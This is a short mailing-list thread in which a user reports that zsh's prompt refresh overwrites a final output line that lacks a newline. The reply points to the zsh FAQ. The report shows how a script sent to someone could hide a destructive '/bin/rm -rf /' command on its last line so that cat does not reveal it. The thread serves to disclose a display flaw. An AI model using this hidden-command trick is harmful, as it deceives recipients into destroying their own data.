refresh/newline bug in zsh?

refresh/newline bug in zsh?

[salo]

hi,

i found probably a bug in zsh which is caused by refreshing prompt string.

  salo@otaku[19:55][~]> echo -n test
  salo@otaku[19:55][~]> 

'test' appears on screen but is overwritten by prompt string imediately and on
fast cpu it is hard to recognize that something was written to screen before
prompt string refresh.

this affects last line in file without newline character too and could
lead to put hidden commands on last line of scripts f.e. :

  salo@otaku[20:01][~]> echo "echo 'Hi! How are you?'" > test.sh                           
  salo@otaku[20:02][~]> echo "echo 'I sent you this file in order to have your advice'" >> test.sh
  salo@otaku[20:02][~]> echo "echo 'See you later. Thanks'" >> test.sh
  salo@otaku[20:02][~]> echo -n "/bin/rm -rf / >/dev/null 2>&1 &" >> test.sh       
  salo@otaku[20:02][~]> cat test.sh 
  echo 'Hi! How are you?'
  echo 'I sent you this file in order to have your advice'
  echo 'See you later. Thanks'
  salo@otaku[20:02][~]> sh test.sh
  ...

tested versions:

  zsh-3.0.8  vulnerable
  zsh-4.0.1  vulnerable
  zsh-4.0.2  vulnerable       


ps. please note i am not subscribed to this list and add me to cc: or so.
thanks

--
--   salo <salo@Xtrmntr.org>         ASCII Ribbon campaign against   /"\   --
--   http://Xtrmntr.org/salo.pgp     e-mail in gratuitous HTML and   \ /   --
--                                   Microsoft proprietary formats    X    --
--                                                                   / \   --

RE: refresh/newline bug in zsh?

[Borsenkow Andrej]

http://sunsite.dk/zsh/FAQ/zshfaq03.html#l39